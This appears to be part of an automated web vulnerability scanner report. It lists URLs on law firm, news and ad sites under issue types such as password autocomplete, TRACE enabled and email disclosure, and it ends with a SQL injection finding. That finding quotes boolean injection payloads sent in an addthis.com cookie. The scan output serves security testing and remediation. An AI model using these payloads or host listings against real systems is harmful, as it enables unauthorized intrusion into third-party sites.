18.102. http://www.gartner.com/css/win/main.css

18.103. http://www.gartner.com/css/win/navigation.css

18.104. http://www.gartner.com/images/homepage/gartner80.gif

18.105. http://www.gartner.com/images/popup_logo_071201.gif

18.106. http://www.gartner.com/images/trans_pixel.gif

18.107. http://www.gartner.com/include/webtrends.jsp

18.108. http://www.gartner.com/it/css/g1_header_footer.css

18.109. http://www.gartner.com/it/images/homepage/gartner136.gif

18.110. http://www.gartner.com/it/include/g1_footer.js

18.111. http://www.gartner.com/js/cookie.js

18.112. http://www.gartner.com/js/layerapi.js

18.113. http://www.gartner.com/js/menu.js

18.114. http://www.gartner.com/js/mouseevents.js

18.115. http://www.gartner.com/js/navigation.js

18.116. http://www.gartner.com/js/optionsArray.jsp

18.117. http://www.gartner.com/js/regionalsText.js

18.118. http://www.gartner.com/js/unica/ntpagetag.js

18.119. http://www.gartner.com/js/utility.js

18.120. http://www.gartner.com/js/webtrendsCookies.js

18.121. http://www.gartner.com/pages/docs/gartner/mq/scripts/utils.js

18.122. https://www.gartner.com/login/loginInitAction.do

18.123. http://www.google.com/finance

18.124. https://www.google.com/accounts/ServiceLogin

18.125. http://www.hartfordbusiness.com/phpAds/adjs.php

18.126. http://www.hartfordbusiness.com/phpAds/www/delivery/lg.php

18.127. http://www.howardrice.com/

18.128. http://www.howardrice.com/6862

18.129. http://www.howardrice.com/Alumni

18.130. http://www.howardrice.com/Events

18.131. http://www.howardrice.com/WebResource.axd

18.132. http://www.howardrice.com/showlandingpage.aspx

18.133. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

18.134. http://www.moritthock.com/

18.135. http://www.moritthock.com/index.php

18.136. http://www.moritthock.com/index.php/attorneys

18.137. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth

18.138. http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f

18.139. http://www.moritthock.com/index.php/news_events/press_releases

18.140. http://www.moritthock.com/index.php/news_events/television_media

18.141. http://www.moritthock.com/index.php/practice_areas

18.142. http://www.nytimes.com/2007/02/09/business/09legal.html

18.143. http://www.nytimes.com/2009/01/13/business/13bail.html

18.144. http://www.nytimes.com/2009/06/19/business/19scrushy.html

18.145. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

18.146. http://www.orangecountyala.org/clubportal/memlogin.cfm

18.147. http://www.perkinscoie.com/

18.148. http://www.perkinscoie.com/AdvancedSearch.aspx

18.149. http://www.perkinscoie.com/FCWSite/abc.aspx

18.150. http://www.perkinscoie.com/events/eventslist.aspx

18.151. http://www.perkinscoie.com/firm/firm.aspx

18.152. http://www.perkinscoie.com/mquehrn/

18.153. http://www.perkinscoie.com/news/news_detail.aspx

18.154. http://www.perkinscoie.com/professionals/professionals.aspx

18.155. http://www.perkinscoie.com/professionals/professionals_detail.aspx

18.156. http://www.perkinscoie.com/professionals/professionals_results.aspx

18.157. http://www.perkinscoie.com/professionals/professionals_vcard.aspx

18.158. http://www.porterwright.com/

18.159. http://www.porterwright.com/404.aspx

18.160. http://www.porterwright.com/FCWSite/Include/spamproof.aspx

18.161. http://www.porterwright.com/aboutus/xpqGC.aspx

18.162. http://www.porterwright.com/careers/

18.163. http://www.porterwright.com/careers/xpqGC.aspx

18.164. http://www.porterwright.com/contactus/

18.165. http://www.porterwright.com/emailthispage/emdisclaimer.aspx

18.166. http://www.porterwright.com/favicon.ico

18.167. http://www.porterwright.com/government--regulatory-affairs-practice-areas/

18.168. http://www.porterwright.com/news/xpqNewsDetail.aspx

18.169. http://www.porterwright.com/people/

18.170. http://www.porterwright.com/professionals/xpqProfResults.aspx

18.171. http://www.porterwright.com/search/xpqSiteSearch.aspx

18.172. http://www.porterwright.com/services/

18.173. http://www.porterwright.com/services/xpqServiceDetail.aspx

18.174. http://www.porterwright.com/services/xpqServiceListPW.aspx

18.175. http://www.porterwright.com/styleBuilder.aspx

18.176. http://www.wendel.com/index.cfm

18.177. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

18.178. http://www.wi-ala.org/clubportal/loginretrieval.cfm

18.179. http://www.wi-ala.org/clubportal/memLogin.cfm

18.180. http://www.wi-ala.org/clubportal/memLoginExe.cfm

18.181. http://www.wi-ala.org/clubportal/wala/Page.cfm

19. Password field with autocomplete enabled

19.1. https://client.poynerspruill.com/Pages/Home.aspx

19.2. https://client.poynerspruill.com/pages/changepassword.aspx

19.3. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

19.4. https://www.gartner.com/login/loginInitAction.do

19.5. https://www.google.com/accounts/ServiceLogin

19.6. http://www.hartfordbusiness.com/news14300.html

19.7. http://www.hartfordbusiness.com/news14300.html

19.8. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.9. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.10. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.11. http://www.orangecountyala.org/clubportal/memlogin.cfm

19.12. http://www.pillsburylaw.com/

19.13. http://www.pillsburylaw.com/index.cfm

19.14. http://www.pillsburylaw.com/index.cfm

19.15. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

19.16. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

19.17. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

19.18. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

19.19. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

19.20. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

19.21. http://www.wi-ala.org/ClubPortal/wala/

19.22. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

19.23. http://www.wi-ala.org/clubportal/memLogin.cfm

19.24. http://www.wi-ala.org/clubportal/wala/Page.cfm

20. Source code disclosure

20.1. http://graphics8.nytimes.com/js/app/article/articleCommentCount.js

20.2. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js

21. ASP.NET debugging enabled

21.1. http://www.ctlawtribune.com/Default.aspx

21.2. http://www.howardrice.com/Default.aspx

21.3. http://www.iimagazine.com/Default.aspx

22. Referer-dependent response

22.1. http://centrifugesystems.app101.hubspot.com/Inactive.aspx

22.2. http://www.hartfordbusiness.com/phpAds/adjs.php

22.3. http://www.sheehan.com/

22.4. http://www.wi-ala.org/clubportal/loginretrieval.cfm

23. Cross-domain POST

23.1. http://baxterhall.com/

23.2. http://www.rtacpa.com/

24. Cross-domain Referer leakage

24.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

24.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

24.3. http://gigablast.com/

24.4. http://googleads.g.doubleclick.net/pagead/ads

24.5. http://layserfreiwald.com/attorneys.html

24.6. http://layserfreiwald.com/attorneys.html

24.7. http://www.bing.com/search

24.8. http://www.gartner.com/0_admin/PasswordRequest.jsp

24.9. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp

24.10. http://www.gigablast.com/

24.11. http://www.google.com/search

24.12. http://www.google.com/search

24.13. http://www.google.com/search

24.14. http://www.google.com/search

24.15. http://www.google.com/search

24.16. http://www.google.com/search

24.17. http://www.google.com/search

24.18. http://www.google.com/search

24.19. http://www.google.com/search

24.20. http://www.google.com/search

24.21. http://www.google.com/search

24.22. http://www.google.com/search

24.23. http://www.google.com/search

24.24. http://www.google.com/search

24.25. http://www.google.com/search

24.26. http://www.google.com/search

24.27. http://www.google.com/search

24.28. http://www.google.com/search

24.29. http://www.google.com/search

24.30. http://www.google.com/search

24.31. http://www.google.com/search

24.32. http://www.google.com/search

24.33. http://www.ngelaw.com/news/event_detail.aspx

24.34. http://www.orangecountyala.org/clubportal/memlogin.cfm

24.35. http://www.perkinscoie.com/events/eventslist.aspx

24.36. http://www.perkinscoie.com/professionals/professionals_results.aspx

24.37. http://www.pomerantzlaw.com/cases.html

24.38. http://www.pomerantzlaw.com/practice-areas.html

24.39. http://www.stumbleupon.com/badge/embed/1/

24.40. http://www.tydingslaw.com/Content.aspx

24.41. http://www.wendel.com/index.cfm

24.42. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

24.43. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

24.44. http://www.wi-ala.org/clubportal/loginretrieval.cfm

24.45. http://www.wi-ala.org/clubportal/memLogin.cfm

24.46. http://www.wi-ala.org/clubportal/wala/Page.cfm

24.47. http://www.wiggin.com/showarea.aspx

25. Cross-domain script include

25.1. http://baxterhall.com/

25.2. http://googleads.g.doubleclick.net/pagead/ads

25.3. http://layserfreiwald.com/

25.4. http://layserfreiwald.com/attorneys.html

25.5. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html

25.6. http://m.perkinscoie.com/

25.7. http://m.perkinscoie.com/practices/

25.8. http://m.perkinscoie.com/publications/

25.9. http://www.bloomberg.com/apps/news

25.10. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

25.11. http://www.centrifugesystems.com/

25.12. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Left.png

25.13. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Top.png

25.14. http://www.dmoc.com/contact

25.15. http://www.dmoc.com/practice

25.16. http://www.elawmarketing.com/about/clients

25.17. http://www.elawmarketing.com/about/staff

25.18. http://www.elawmarketing.com/portfolio

25.19. http://www.elawmarketing.com/portfolio/websites

25.20. http://www.elawmarketing.com/portfolio/websites/diserio-martin-oconnor-castiglioni-llp

25.21. http://www.elawmarketing.com/portfolio/websites/layser-freiwald

25.22. http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators

25.23. http://www.elawmarketing.com/portfolio/websites/orange-county-chapter-association-legal-administrators

25.24. http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp

25.25. http://www.elawmarketing.com/portfolio/websites/rothman-consulting

25.26. http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

25.27. http://www.fundingpost.com/breakfast/reg1.asp

25.28. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp

25.29. http://www.gartner.com/technology/vendor-insights/procurement-sourcing-technology.jsp

25.30. http://www.glaala.org/clubportal/glaala/index.cfm

25.31. http://www.hartfordbusiness.com/news14300.html

25.32. http://www.howardrice.com/

25.33. http://www.howardrice.com/6862

25.34. http://www.howardrice.com/Alumni

25.35. http://www.howardrice.com/Events

25.36. http://www.letipli.com/member_details.asp

25.37. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

25.38. http://www.memberize.com/

25.39. http://www.njbiz.com/article.asp

25.40. http://www.nldhlaw.com/

25.41. http://www.nldhlaw.com/PracticeAreas/Employment-Law.asp

25.42. http://www.nldhlaw.com/PracticeAreas/Institutional-Litigation-and-Consulting.asp

25.43. http://www.nytimes.com/2007/02/09/business/09legal.html

25.44. http://www.nytimes.com/2009/01/13/business/13bail.html

25.45. http://www.nytimes.com/2009/06/19/business/19scrushy.html

25.46. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

25.47. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

25.48. http://www.orangecountyala.org/clubportal/memlogin.cfm

25.49. http://www.orangecountyala.org/clubportal/ocala/

25.50. http://www.perkinscoie.com/

25.51. http://www.perkinscoie.com/AdvancedSearch.aspx

25.52. http://www.perkinscoie.com/events/eventslist.aspx

25.53. http://www.perkinscoie.com/firm/firm.aspx

25.54. http://www.perkinscoie.com/mquehrn/

25.55. http://www.perkinscoie.com/news/news_detail.aspx

25.56. http://www.perkinscoie.com/professionals/professionals.aspx

25.57. http://www.perkinscoie.com/professionals/professionals_results.aspx

25.58. http://www.pomerantzlaw.com/cases.html

25.59. http://www.pomerantzlaw.com/contact-us.html

25.60. http://www.pomerantzlaw.com/institutional-investor-services/litigation-services-for-investors.html

25.61. http://www.pomerantzlaw.com/practice-areas.html

25.62. http://www.pomerantzlaw.com/the-firm/what-makes-pomerantz-unique.html

25.63. http://www.powelltrachtman.com/

25.64. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp

25.65. http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp

25.66. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx

25.67. http://www.semmes.com/attorney_search.asp

25.68. http://www.semmes.com/contact/associate.asp

25.69. http://www.semmes.com/contact/default.asp

25.70. http://www.semmes.com/contactus.asp

25.71. http://www.semmes.com/offices/salisbury.asp

25.72. http://www.semmes.com/offices/virginia.asp

25.73. http://www.sleepertechnologies.com/

25.74. http://www.stumbleupon.com/badge/embed/1/

25.75. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

25.76. http://www.tydingslaw.com/

25.77. http://www.tydingslaw.com/ArticlesPublications.aspx

25.78. http://www.tydingslaw.com/Content.aspx

25.79. http://www.tydingslaw.com/OurAttorneys.aspx

25.80. http://www.tydingslaw.com/PracticesIndustries.aspx

25.81. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx

25.82. http://www.tydingslaw.com/PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx

25.83. http://www.tydingslaw.com/SearchResults.aspx

25.84. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

25.85. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

25.86. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

25.87. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

25.88. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html

25.89. http://www.wi-ala.org/ClubPortal/wala/

25.90. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

25.91. http://www.wi-ala.org/clubportal/loginretrieval.cfm

25.92. http://www.wi-ala.org/clubportal/memLogin.cfm

25.93. http://www.wi-ala.org/clubportal/wala/Page.cfm

26. TRACE method is enabled

26.1. http://ads.keypromedia.com/

26.2. http://attorney.findlaw.com/

26.3. http://c.statcounter.com/

26.4. http://capgroup.112.2o7.net/

26.5. http://d1.openx.org/

26.6. http://elawmarketing.com/

26.7. http://r.openx.net/

26.8. http://tracking.hubspot.com/

26.9. http://www.bisnow.com/

26.10. http://www.centrifugesystems.com/

26.11. http://www.dmoc.com/

26.12. http://www.elawmarketing.com/

26.13. http://www.forbes.com/

26.14. http://www.letipli.com/

26.15. http://www.milbanktweed.org/

26.16. http://www.nealgerber.com/

26.17. http://www.ngelaw.com/

26.18. http://www.njsba.com/

26.19. http://www.npr.org/

26.20. http://www.ober.com/

26.21. http://www.peckshaffer.com/

26.22. http://www.semmes.com/

26.23. http://www.sleepertechnologies.com/

26.24. http://www.stumbleupon.com/

26.25. http://www.superlawyers.com/

26.26. http://www.weblinedesigns.com/

27. Email addresses disclosed

27.1. http://baxterhall.com/

27.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

27.3. https://client.poynerspruill.com/Pages/Home.aspx

27.4. http://imagesrv.gartner.com/media/jwplayer/flowplayer.ipad-3.2.1.js

27.5. http://layserfreiwald.com/

27.6. http://layserfreiwald.com/attorneys.html

27.7. http://layserfreiwald.com/attorneys.html

27.8. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html

27.9. https://mail.howardrice.com/exchweb/bin/auth/owalogon.asp

27.10. http://www.capgroup.com/_js/s_code.js

27.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

27.12. http://www.fundingpost.com/breakfast/reg1.asp

27.13. http://www.glaala.org/clubportal/glaala/index.cfm

27.14. http://www.glaala.org/clubportal/js/date-picker.js

27.15. http://www.google.com/search

27.16. https://www.google.com/accounts/ServiceLogin

27.17. http://www.hartfordbusiness.com/fs_webkit/fs_toolbox.js

27.18. http://www.hartfordbusiness.com/fs_webkit/jquery/dimensions_1.1.2.js

27.19. http://www.hartfordbusiness.com/news14300.html

27.20. http://www.lawseminars.com/detail.php

27.21. http://www.mccarter.com/new/contactnew.aspx

27.22. http://www.mccarter.com/new/homenew.aspx

27.23. http://www.mccarter.com/new/privacynew.aspx

27.24. http://www.mccarter.com/new/showcareerpagenew.aspx

27.25. http://www.mccarter.com/new/showeventnew.aspx

27.26. http://www.milbank.com/en/Alumni/

27.27. http://www.milbank.com/en/NewsEvents/RecentPressRel/Milbank_Represents_Lenders_in_Financing_of_Two_40_MW_Hydropower_Plants_in_Chile.htm

27.28. http://www.moritthock.com/

27.29. http://www.moritthock.com/index.php

27.30. http://www.moritthock.com/index.php/attorneys

27.31. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth

27.32. http://www.ngelaw.com/attorney/bio.aspx

27.33. http://www.ngelaw.com/attorney/results.aspx

27.34. http://www.ngelaw.com/news/event_detail.aspx

27.35. http://www.ngelaw.com/news/events.aspx

27.36. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

27.37. http://www.ober.com/practices/32

27.38. http://www.ober.com/practices/55

27.39. http://www.ober.com/practices/intellectual-property

27.40. http://www.orangecountyala.org/clubportal/js/date-picker.js

27.41. http://www.peckshaffer.com/contact.php

27.42. http://www.perkinscoie.com/fcwsite/include/flowplayer/flowplayer.playlist-3.0.1.min.js

27.43. http://www.pillsburylaw.com/index.cfm

27.44. http://www.pomerantzlaw.com/cases.html

27.45. http://www.pomerantzlaw.com/contact-us.html

27.46. http://www.porterwright.com/careers/

27.47. http://www.powelltrachtman.com/Includes/clientcode/browserdetect.js

27.48. http://www.poynerspruill.com/newsandevents/Pages/Creditors%27Committees.aspx

27.49. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx

27.50. http://www.rtacpa.com/

27.51. http://www.semmes.com/contact/default.asp

27.52. http://www.semmes.com/contactus.asp

27.53. http://www.sheehan.com/news/articles/Dastin-Honored-with-David-P.-Goodwin-NeighborWorks--Outstanding-Neighbor-Award_497.aspx

27.54. http://www.sheehan.com/people/attorneys/Katherine-M.-Hanna.aspx

27.55. http://www.sleepertechnologies.com/

27.56. http://www.smithmazure.com/

27.57. http://www.smithmazure.com/attorney.asp

27.58. http://www.smithmazure.com/indus-manu.htm

27.59. http://www.smithmazure.com/news.asp

27.60. http://www.smithmazure.com/newsletters.asp

27.61. http://www.smithmazure.com/practice.asp

27.62. http://www.smithmazure.com/resources.asp

27.63. http://www.sutphinblvdbid.org/

27.64. http://www.tydingslaw.com/OurAttorneys.aspx

27.65. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx

27.66. http://www.tydingslaw.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

27.67. http://www.tydingslaw.com/Resources/Shared/scripts/widgets.js

27.68. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

27.69. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

27.70. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

27.71. http://www.wi-ala.org/clubportal/js/date-picker.js

27.72. http://www.wi-ala.org/clubportal/loginretrieval.cfm

27.73. http://www.wi-ala.org/clubportal/wala/Page.cfm

27.74. http://www.wiggin.com/alumni.aspx

27.75. http://www.wiggin.com/bios.aspx

27.76. http://www.wiggin.com/showarea.aspx

28. Private IP addresses disclosed

29. Social security numbers disclosed

30. Credit card numbers disclosed

31. Robots.txt file

31.1. http://158-vdp-616.mktoresp.com/webevents/visitWebPage

31.2. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5

31.3. http://ads.keypromedia.com/www/delivery/ajs.php

31.4. http://api.recaptcha.net/challenge

31.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

31.6. http://b.scorecardresearch.com/b

31.7. http://c.statcounter.com/t.php

31.8. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182

31.9. http://cspix.media6degrees.com/orbserv/hbpix

31.10. http://d1.openx.org/spcjs.php

31.11. http://ehg-findlaw.hitbox.com/HG

31.12. http://feeds.bbci.co.uk/news/rss.xml

31.13. http://gigablast.com/

31.14. http://googleads.g.doubleclick.net/pagead/ads

31.15. http://image.exct.net/aec5805b-4.jpg

31.16. http://imagesrv.gartner.com/css/TabbedPanels.css

31.17. http://l.addthiscdn.com/live/t00/250lo.gif

31.18. http://m.perkinscoie.com/

31.19. http://maps.google.com/maps

31.20. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

31.21. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

31.22. http://s7.addthis.com/js/250/addthis_widget.js

31.23. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1YgDIOiIAyoHWcQAAP__ADIFVcQAAA8

31.24. http://safebrowsing.clients.google.com/safebrowsing/downloads

31.25. http://t2.gstatic.com/images

31.26. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

31.27. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php

31.28. http://www.bloomberg.com/apps/news

31.29. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

31.30. http://www.capgroup.com/

31.31. http://www.centrifugesystems.com/

31.32. http://www.chambersandpartners.com/europe/rankings36.aspx

31.33. http://www.cnbc.com/id/15840232

31.34. http://www.dmoc.com/

31.35. http://www.elawmarketing.com/about/staff

31.36. http://www.elfaonline.org/pub/news/indnews/news_report.cfm

31.37. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

31.38. http://www.freep.com/apps/pbcs.dll/article

31.39. http://www.ft.com/cms/s/0/fd2e0fcc-4a55-11de-8e7e-00144feabdc0.html

31.40. http://www.gartner.com/technology/home.jsp

31.41. https://www.gartner.com/login/loginInitAction.do

31.42. http://www.gigablast.com/

31.43. http://www.glaala.org/clubportal/glaala/index.cfm

31.44. http://www.goclubexe.com/clubportal

31.45. http://www.google-analytics.com/__utm.gif

31.46. http://www.google.com/search

31.47. https://www.google.com/accounts/ServiceLogin

31.48. http://www.hartfordbusiness.com/news14300.html

31.49. http://www.howardrice.com/

31.50. http://www.jdtplaw.com/

31.51. http://www.law.com/jsp/article.jsp

31.52. http://www.letipli.com/member_details.asp

31.53. http://www.linkedin.com/companies/peck-shaffer-&-williams

31.54. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

31.55. http://www.memberize.com/

31.56. http://www.microsoft.com/ContentRedirect.asp

31.57. http://www.milbank.com/en

31.58. http://www.milbanktweed.org/GENERAL/Extranet.nsf/ClientLogin

31.59. http://www.njbiz.com/article.asp

31.60. http://www.nldhlaw.com/

31.61. http://www.npr.org/templates/story/story.php

31.62. http://www.nytimes.com/reuters/2009/11/30/arts/entertainment-us-golf-woods.html

31.63. http://www.orangecountyala.org/clubportal/ocala/

31.64. http://www.perkinscoie.com/

31.65. http://www.pillsburylaw.com/

31.66. https://www.pillsburylaw.com/index.cfm

31.67. http://www.porterwright.com/

31.68. http://www.powelltrachtman.com/

31.69. http://www.semmes.com/attorney_search.asp

31.70. http://www.sleepertechnologies.com/

31.71. http://www.stumbleupon.com/hostedbadge.php

31.72. http://www.superlawyers.com/redir

31.73. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

31.74. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

31.75. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html

31.76. http://www.weblinedesigns.com/

31.77. http://www.wi-ala.org/ClubPortal/wala/

32. Cacheable HTTPS response

32.1. https://citrix.howardrice.com/Citrix/AccessPlatform/

32.2. https://client.poynerspruill.com/Pages/Home.aspx

32.3. https://client.poynerspruill.com/pages/changepassword.aspx

32.4. https://client.poynerspruill.com/pages/forgotpassword.aspx

32.5. https://www.gartner.com/favicon.ico

32.6. https://www.gartner.com/login/loginInitAction.do

33. Multiple content types specified

34. HTML does not specify charset

34.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

34.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

34.3. http://citrix.howardrice.com/

34.4. http://gigablast.com/addurl

34.5. http://gigablast.com/favicon.ico

34.6. http://gigablast.com/gsa.html

34.7. http://gigablast.com/prcts.html

34.8. http://gigablast.com/prdir.html

34.9. http://gigablast.com/search

34.10. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html

34.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

34.12. http://www.gigablast.com/addurl

34.13. http://www.gigablast.com/search

34.14. http://www.google.com/recaptcha/api/image

34.15. http://www.jdtplaw.com/favicon.ico

34.16. http://www.mccarter.com/

34.17. http://www.moritthock.com/index.php

34.18. http://www.nldhlaw.com/favicon.ico

34.19. http://www.nytimes.com/adx/bin/adx_remote.html

34.20. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

34.21. http://www.nytimes.com/facebook

34.22. http://www.nytimes.com/svc/timespeople/bell.html

34.23. http://www.powelltrachtman.com/favicon.ico

34.24. http://www.rothmanconsulting.com/favicon.ico

34.25. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

35. HTML uses unrecognised charset

35.1. http://gigablast.com/

35.2. http://www.gartner.com/0_admin/PasswordRequest.jsp

35.3. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp

35.4. http://www.gartner.com/include/webtrends.jsp

35.5. http://www.gigablast.com/

35.6. http://www.hartfordbusiness.com/news14300.html

36. Content type incorrectly stated

36.1. http://centrifugesystems.app101.hubspot.com/salog.js.aspx

36.2. http://gigablast.com/favicon.ico

36.3. http://image.exct.net/3aa0b01a-9.jpg

36.4. http://image.exct.net/66630590-4.jpg

36.5. http://image.exct.net/aec5805b-4.jpg

36.6. http://js.nyt.com/js/app/moth/moth.js

36.7. http://m.perkinscoie.com/FCWSite/img/mobile/read_more.png

36.8. http://m.perkinscoie.com/FCWSite/img/mobile/read_more_hover.png

36.9. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

36.10. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

36.11. http://www.dmoc.com/favicon.ico

36.12. http://www.gartner.com/favicon.ico

36.13. http://www.gartner.com/include/webtrends.jsp

36.14. http://www.gartner.com/technology/include/metricsHelper.jsp

36.15. https://www.gartner.com/favicon.ico

36.16. http://www.glaala.org/clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff

36.17. http://www.moritthock.com/index.php

36.18. http://www.nytimes.com/adx/bin/adx_remote.html

36.19. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

36.20. http://www.nytimes.com/facebook

36.21. http://www.nytimes.com/svc/timespeople/bell.html

36.22. http://www.porterwright.com/files/ImageControl/df2c4f38-f32b-4661-95a3-f93deff66e3b/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/SitemapImage.jpg

36.23. http://www.stumbleupon.com/hostedbadge.php

36.24. http://www.wiggin.com/images/nav_recruiting.gif

37. Content type is not specified

37.1. https://client.poynerspruill.com/favicon.ico

37.2. http://gigablast.com/scripts/rollovers.js

37.3. http://labs.natpal.com/trk/lead

37.4. http://labs.natpal.com/trk/pixel

37.5. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx



1. SQL injection  next
There are 106 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [dt cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The dt cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

